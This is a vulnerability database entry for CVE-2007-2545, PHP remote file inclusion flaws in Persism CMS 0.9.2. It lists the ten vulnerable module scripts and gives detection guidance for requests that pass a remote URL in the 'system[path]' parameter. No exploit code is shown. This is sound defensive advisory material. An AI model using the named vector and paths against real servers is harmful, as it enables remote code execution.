cbcvebase.
CVE-2007-2545
published 2007-05-09

CVE-2007-2545: Multiple PHP remote file inclusion vulnerabilities in Persism CMS 0.9.2 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the…

PriorityP260high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
68.75%
99.3th percentile
Multiple PHP remote file inclusion vulnerabilities in Persism CMS 0.9.2 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the system[path] parameter to (1) blocks/headerfile.php, (2) files/blocks/latest_files.php, (3) filters/headerfile.php, (4) forums/blocks/latest_posts.php, (5) groups/headerfile.php, (6) links/blocks/links.php, (7) menu/headerfile.php, (8) news/blocks/latest_news.php, (9) settings/headerfile.php, or (10) users/headerfile.php, in modules/.

Affected

1 ranges
VendorProductVersion rangeFixed in
persism_cmspersism_cms<= 0.9.2

Detection & IOCsextracted from sources · hover to see the quote

path/modules/blocks/headerfile.php
path/modules/files/blocks/latest_files.php
path/modules/filters/headerfile.php
path/modules/forums/blocks/latest_posts.php
path/modules/groups/headerfile.php
path/modules/links/blocks/links.php
path/modules/menu/headerfile.php
path/modules/news/blocks/latest_news.php
path/modules/settings/headerfile.php
path/modules/users/headerfile.php
  • Detect HTTP requests targeting any of the vulnerable PHP scripts with a user-supplied URL in the system[path] parameter, indicating remote file inclusion attempt.
  • Monitor web server logs for GET/POST requests containing 'system[path]=' with an http:// or https:// value (remote URL) directed at any script under the /modules/ directory tree.
  • ·Exploitation requires the PHP 'allow_url_include' (or 'allow_url_fopen') directive to be enabled on the target server; installations with these disabled are not exploitable via this RFI vector.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.